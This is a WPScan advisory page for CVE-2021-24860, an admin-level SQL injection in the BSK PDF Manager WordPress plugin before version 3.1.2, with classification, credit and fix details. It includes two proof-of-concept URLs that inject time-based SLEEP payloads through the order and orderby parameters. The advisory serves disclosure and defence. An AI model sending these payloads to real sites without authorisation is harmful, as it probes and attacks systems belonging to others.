WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

BSK PDF Manager < 3.1.2 - Admin+ SQL Injection

Description

The plugin does not validate and escape the orderby and order parameters before using them in a SQL statement, leading to a SQL injection issue

Proof of Concept

With at least one BSK PDF Category:

https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&order=and+sleep(5)
https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&orderby=last_date`+AND+SLEEP(5)+OR+`last_date

Affects Plugins

bsk-pdf-manager
Fixed in version 3.1.2

References

CVE
CVE-2021-24860

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website
https://blog.szfszf.top
Verified

Yes

WPVDB ID
d5891973-37d0-48cb-a5a3-a26c771b3369

Timeline

Publicly Published

2021-11-01 (about 1 years ago)

Added

2021-11-01 (about 1 years ago)

Last Updated

2022-09-26 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin